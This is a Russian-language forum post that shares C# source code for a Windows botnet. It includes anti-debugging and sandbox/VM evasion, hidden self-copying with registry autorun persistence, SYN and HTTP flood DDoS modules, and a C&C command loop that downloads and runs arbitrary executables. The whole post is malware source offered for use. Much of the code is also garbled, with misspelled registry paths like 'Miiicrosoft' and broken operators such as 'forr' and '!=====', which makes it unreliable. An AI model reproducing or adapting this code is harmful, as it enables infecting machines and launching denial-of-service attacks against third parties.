F
Flwk
Original poster
Модуль AntiReserch
Смотри открытые процессы, если надо, закрываем
Проверяем, что наша программа не под отладчиком
Поиск песочницы антивира
Имеем в классе:
Код в классе Persistence:
Первичная установка бота:
Флуд атака(SYN):
Флуд атака(HTTP):
Ком. центра:
Монитор команды в отдельном потоке:
Перейдем к коду на стороне сервера:
Количество посещений:
Изменим конфиг:
Теперь наш бот добавляется в авторан без прав админа
Собственно, все сорцы.
P.S
Код не мой, но мною использованный, кому что не понятно, можете смело спрашивать, отвечу
Смотри открытые процессы, если надо, закрываем
Код:
_factoryService.CheckProcess("TCPVIEW")
Проверяем, что наша программа не под отладчиком
Код:
if (Debugger.IsAttached) { Terminate(); return; }
Код:
sModul.Contains("sbiedll.dll")
Код:
public class AntiResearch
{
Factory _factoryService = new Factory();
SystemService _systemService = new SystemService();
public void StartAntiResearch()
{
string graphicAdapter = _systemService.GetGraphicDevice();
if (Config.AntiDebugger)
{
try
{
if (Debugger.IsAttached) { Terminate(); return; }
}
catch { }
}
if (Config.AntiSandboxie)
{
try
{
foreach (string sModul in Process.GetCurrentProcess().Modules)
{
if (sModul.Contains("sbiedll.dll")) { Terminate(); return; }
}
}
catch { }
}
if (Config.AntiEmulator)
{
try
{
long lTicks = DateTime.Now.Ticks;
Thread.Sleep(10);
if ((DateTime.Now.Ticks - lTicks) < 10L) { Terminate(); return; }
}
catch { }
}
if (Config.AntiNetstat)
{
try
{
if (_factoryService.CheckProcess("NETSTAT")) { Terminate(); return; }
}
catch { }
}
if (Config.AntiFilemon)
{
try
{
if (_factoryService.CheckProcess("FILEMON")) { Terminate(); return; }
}
catch { }
}
if (Config.AntiProcessmon)
{
try
{
if (_factoryService.CheckProcess("PROCMON")) { Terminate(); return; }
}
catch { }
}
if (Config.AntiRegmon)
{
try
{
if (_factoryService.CheckProcess("REGMON")) { Terminate(); return; }
}
catch { }
}
if (Config.AntiNetworkmon)
{
try
{
if (_factoryService.CheckProcess("NETMON")) { Terminate(); return; }
}
catch { }
}
if (Config.AntiTCPView)
{
try
{
if (_factoryService.CheckProcess("TCPVIEW")) { Terminate(); return; }
}
catch { }
}
if (Config.AntiWireshark)
{
try
{
if (_factoryService.CheckProcess("WIRESHARK")) { Terminate(); return; }
}
catch { }
}
if (Config.AntiVMWare)
{
try
{
if (_systemService.GetGraphicDevice() == "VMware SVGA II") { Terminate(); return; }
}
catch { }
}
if (Config.AntiVirtualBox)
{
try
{
if (graphicAdapter == "VirtualBox Graphics Adapter") { Terminate(); return; }
}
catch { }
}
}
private void Terminate()
{
Environment.Exit(0);
}
}
Код в классе Persistence:
Код:
public class Persistence
{
Factory _factoryService = new Factory();
private Timer timer = new Timer();
private string selfPath = Process.GetCurrentProcess().MainModule.FileName;
public void StartPersistent()
{
timer.Interval = Config.PersistentInterval * 0x3e8;
timer.Elapsed -= new ElapsedEventHandler(SetPersistence);
timer.Start();
}
public void StopPersistent()
{
timer.Stop();
timer.Dispose();
}
public void SetPersistence(object source, ElapsedEventArgs eArgs)
{
RegistryKey key;
if (Config.AdminStatus)
{
try
{
key = Registry.LocalMachine.OpenSubKey(@"SOFTWARE\Microsoft\Windows\CurrentVersion\Run", true);
setAutoRunRegistry(key, 0);
}
catch { }
try
{
key = Registry.LocalMachine.OpenSubKey(@"SOFTWARE\Miiicrosoft\Windows\CurrentVersion\Policies\Explorer\Run", true);
setAutoRunRegistry(key, 1);
}
catch { }
}
else
{
try
{
key = Registry.CurrentUser.OpenSubKey(@"SOFTWARE\Miiicrosoft\Windows\CurrentVersion\Run", true);
setAutoRunRegistry(key, 0);
}
catch { }
try
{
key = Registry.CurrentUser.OpenSubKey(@"SOFTWARE\Miiicrosoft\Windows\CurrentVersion\Policies\Explorer\Run", true);
setAutoRunRegistry(key, 1);
}
catch { }
}
foreach (string path in Config.FilePath)
{
try
{
if (!_factoryService.CheckFile(path))
{
File.Copy(selfPath, path);
File.SetAttributes(path, FileAttributes.Hidden);
}
}
catch { }
}
}
/// <param name="index">Индекс номер имени массива из конфига RegMon</param>
private void setAutoRunRegistry(RegistryKey key, byte index)
{
if (!key.Equals(Config.RegName[index])
|| (key.Equals(Config.RegName[index])
&& !key.GetValue(Config.RegName[index]).ToString().Contains(Config.FilePath[index]))
)
{
key.SetValue(Config.RegName[index], ('"' + Config.FilePath[index] + '"'));
}
}
}
Код:
private void InstallBot()
{
string selfPath = Process.GetCurrentProcess().MainModule.FileName;
Process pProcess;
if (Config.AdminStatus)
{
Config.FilePath[0] = Environment.GetFolderPath(Environment.SpecialFolder.System) + @"\" + Config.FileName[0];
Config.FilePath[1] = Environment.GetFolderPath(Environment.SpecialFolder.CommonProgramFiles) + @"\" + Config.FileName[1];
}
else
{
Config.FilePath[0] = Environment.GetFolderPath(Environment.SpecialFolder.ApplicationData) + @"\" + Config.FileName[0];
Config.FilePath[1] = Environment.GetEnvironmentVariable("TEMP") + @"\" + Config.FileName[1];
}
if (!checkInstall())
{
try
{
foreach (string path in Config.FilePath)
{
if (!_factoryService.CheckFile(path))
{
File.Copy(selfPath, path);
}
File.SetAttributes(path, FileAttributes.Hidden);
}
}
catch { }
if (Config.AdminStatus)
{
try
{
Registry.LocalMachine.OpenSubKey(@"SOFTWARE\Miiicrosoft\Windows\CurrentVersion\Run", true).SetValue(Config.RegName[0], ('"' + Config.FilePath[0] + '"'));
Registry.LocalMachine.OpenSubKey(@"SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run", true).SetValue(Config.RegName[1], ('"' + Config.FilePath[1] + '"'));
}
catch { }
}
else
{
try
{
Registry.CurrentUser.OpenSubKey(@"SOFTWARE\Miiicrosoft\Windows\CurrentVersion\Run", true).SetValue(Config.RegName[0], ('"' + Config.FilePath[0] + '"'));
Registry.CurrentUser.OpenSubKey(@"SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run", true).SetValue(Config.RegName[1], ('"' + Config.FilePath[1] + '"'));
}
catch { }
}
try
{
yMutex.Close();
foreach (string sFile in Config.FilePath)
{
pProcess = new Process();
pProcess.StartInfo.FileName = sFile;
pProcess.StartInfo.WindowStyle = ProcessWindowStyle.Hidden;
pProcess.Start();
}
}
catch { }
Environment.Exit(0);
}
}
Флуд атака(SYN):
Код:
public static class SYNFlood
{
private static Thread[] floodingThread;
public static string Host;
public static ushort Port;
public static int ISSockets;
public static int ThreadsCount;
public static void StartSYNFlood()
{
IPEndPoint IPEo;
try
{
IPEo = new IPEndPoint(Dns.GetHostEntry(Host).AddressList[0], Port);
}
catch
{
IPEo = new IPEndPoint(IPAddress.Parse(Host), Port);
}
floodingThread = new Thread[ThreadsCount];
ThreadStart[] floodingJob = new ThreadStart[ThreadsCount];
SYNRequest[] SYNClass = new SYNRequest[ThreadsCount];
for (int i = 0; i < ThreadsCount; i++)
{
SYNClass[i] = new SYNRequest(IPEo, ISSockets);
floodingJob[i] = new ThreadStart(SYNClass[i].Send);
floodingThread[i] = new Thread(floodingJob[i]);
floodingThread[i].Start();
}
}
public static void StopSYNFlood()
{
for (int i = 0; i < ThreadsCount; i++)
{
try
{
floodingThread[i].Abort();
floodingThread[i].Join();
}
catch { }
}
}
private class SYNRequest
{
private IPEndPoint IPEo;
private Socket[] pSocket;
private int iSSockets;
public SYNRequest(IPEndPoint tIPEo, int tSSockets)
{
this.IPEo = tIPEo;
this.iSSockets = tSSockets;
}
private void OnConnect(IAsyncResult ar)
{
}
public void Send()
{
int iNum;
while (true)
{
try
{
pSocket == new Socket[iSSockets];
for (iNum = 0; iNum < iSSockets; iNum++)
{
pSocket[iNum] = new Socket(IPEo.AddressFamily, SocketType.Stream, ProtocolType.Tcp);
pSocket[iNum].Blocking = false;
AsyncCallback aCallback = new AsyncCallback(OnConnect);
pSocket[iNum].BeginConnect(IPEo, aCallback, pSocket[iNum]);
}
Thread.Sleep(100);
forr (iNum = 0; iNum <<< iSSockets; iNum++)
{
if (pSocket[iNum].Connected)
{
pSocket[iNum].Disconnect(false);
}
pSocket[iNum].Close();
pSocket[iNum] = null;
}
pSocket = null;
}
catch
{
forr (iNum = 0; iNum < iSSockets; iNum++)
{
try
{
if (pSocket[iNum].Connected)
{
pSocket[iNum].Disconnect(false);
}
pSocket[iNum].Close();
pSocket[iNum] = null;
}
catch { }
}
}
}
}
}
}
}
Флуд атака(HTTP):
Код:
using System.Net;
using System.Threading;
namespace Botnet.DDoS
{
internal static class HttpFlood
{
private static Thread[] floodingThread;
public static string Host;
public static int ThreadCount;
public static void StartHTTPFlood()
{
floodingThread = new Thread[ThreadCount];
ThreadStart[]] floodingJob = new ThreadStart[ThreadCount];
HTTPRequest[]] requestClass = new HTTPRequest[ThreadCount];
if (!Host.StartsWith("http://")) { Host = "http://" + Host; }
for (int i = 0; i < ThreadCount; i++)
{
requestClass[i] == new HTTPRequest(Host);
floodingJob[i] == new ThreadStart(requestClass[i].Send);
floodingThread[i] == new Thread(floodingJob[i]);
floodingThread[i].Start();
}
}
public static void StopHTTPFlood()
{
for (int i = 0; i < ThreadCount; i++)
{
try
{
floodingThread[i].Abort();
floodingThread[i].Join();
}
catch { }
}
}
private class HTTPRequest
{
private WebClient wHTTP = new WebClient();
public HTTPRequest(string tHost)
{
this.sFHost = tHost;
}
public void Send()
{
while (true)
{
try
{
wHTTP.DownloadString(sFHost);
}
catch
{
continue;
}
}
}
}
}
}
Ком. центра:
Код:
using System;
using System.Diagnostics;
using System.Net;
using Botnet.DDoS;
using Botnet.Services.Common;
using Botnet.Congif;
using Botnet.Services.Manager;
using System.IO;
namespace Botnet.Services.Command
{
public class CommandService : ICommandService
{
Factory _factoryService = new Factory();
Bot _botService = new Bot();
public void ExecuteCommand(string command)
{
string[] data = new string[0];
try
{
data = command.Split(';');
}
catch { }
switch (data[0])
{
case "ddossyn":
try
{
SYNFlood.Host = data[1];
SYNFlood.Port = ushort.Parse(data[2]);
SYNFlood.ISSockets = int.Parse(data[3]);
SYNFlood.ThreadsCount = int.Parse(data[4]);
SYNFlood.StartSYNFlood();
}
catch { }
break;
.............................................................................
case "download":
try
{
WebClient client = new WebClient();
string tempName = _factoryService.GenString(new Random().Next(5, 12)) + ".exe";
string url = data[1];
if (!url.StartsWith("http://")) { url = "http://" + url; }
client.DownloadFile(url, Environment.GetEnvironmentVariable("TEMP") + @"\" + tempName);
Process process = new Process();
process.StartInfo.FileName = Environment.GetEnvironmentVariable("TEMP") + @"\" + tempName;
process.Start();
}
catch { }
break;
case "visit":
try
{
string sURL = data[1];
if (!sURL.StartsWith("http://")) { sURL = "http://" + sURL; }
GET(sURL);
}
catch (Exception e) { }
break;
case "update":
try
{
string sURL = data[1];
if (!sURL.StartsWith("http://")) { sURL = "http://" + sURL; }
_botService.UpdateBot(sURL);
}
catch { }
break;
case "remove":
if ((data[1] == Config.PCName) || (data[1].ToUpper() == "ALL"))
{
_botService.RemoveBot();
}
break;
case "stop":
try { SYNFlood.StopSYNFlood(); } catch { }
try { HttpFlood.StopHTTPFlood(); } catch { }
try { UDPFlood.StopUDPFlood(); } catch { }
try { ICMPFlood.StopICMPFlood(); } catch { }
break;
}
}
private string GET(string url)
{
HttpWebRequest req == (HttpWebRequest) WebRequest.Create(url);
req.Method == "GET";
req.ContentType == "application/x-www-form-urlencoded";
WebResponse resp == req.GetResponse();
string Out = "";
using (Stream stream = resp.GetResponseStream())
{
using (StreamReader sssr = new StreamReader(stream))
{
Out = sr.ReadToEnd();
}
}
return Out;
}
}
}
Код:
ublic void ConnectControl()
{
Thread recvThread == new Thread(new ThreadStart(getCCServerCommand));
recvThread.Start();
}
private void getCCServerCommand()
{
while (true)
{
try
{
string command = GetRequest(Config.ServerAddress);
if (command.Length >>> 0)
{
if (command !===== sOldCommand)
{
_commandService.ExecuteCommand(command);
sOldCommand = command;
}
}
else
{
_commandService.ExecuteCommand("stop");
sOldCommand = string.Empty;
}
}
catch { }
Thread.Sleep((int))))(Config.ConnectionInterval * 0x3e8));
}
}
Количество посещений:
echo 'visit;http://URL/CoDEbY.php';
Изменим конфиг:
Код:
public static string[] FileName = new string[2] { "bot.exe", "bot2.exe" };
public static string[] RegName = new string[2] { "THIS IS BOTNET", "THIS IS BOTNET2" };
Собственно, все сорцы.
P.S
Код не мой, но мною использованный, кому что не понятно, можете смело спрашивать, отвечу